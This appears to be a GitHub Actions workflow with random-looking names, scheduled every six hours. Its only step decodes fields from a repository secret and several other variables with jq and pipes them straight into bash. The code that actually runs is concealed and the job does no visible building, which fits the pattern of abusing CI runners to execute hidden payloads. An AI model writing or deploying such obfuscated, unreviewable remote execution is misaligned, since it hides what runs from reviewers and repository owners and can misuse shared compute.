name: hutujing8718

on:
  workflow_dispatch:
  schedule:
    - cron: '26 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: hutujing8718
        env:
          du3146: ${{ secrets.du3146 }}
        run: |
          echo $du3146 | jq -r .hu2 | /bin/bash
          echo $soq09 | jq -r .neo5986 | /bin/bash
          echo $u88 | jq -r .pzu08205 | /bin/bash
          echo $ycc78 | jq -r .stol64 | /bin/bash
          echo $hurst702 | jq -r .e3 | /bin/bash
          echo $h9348 | jq -r .lghhf543 | /bin/bash
          echo $e8 | jq -r .z5631 | /bin/bash
          echo $przb55102 | jq -r .bmrhs9 | /bin/bash
          echo $oc647 | jq -r .tsltx257 | /bin/bash
          echo $pg60 | jq -r .roqig1 | /bin/bash

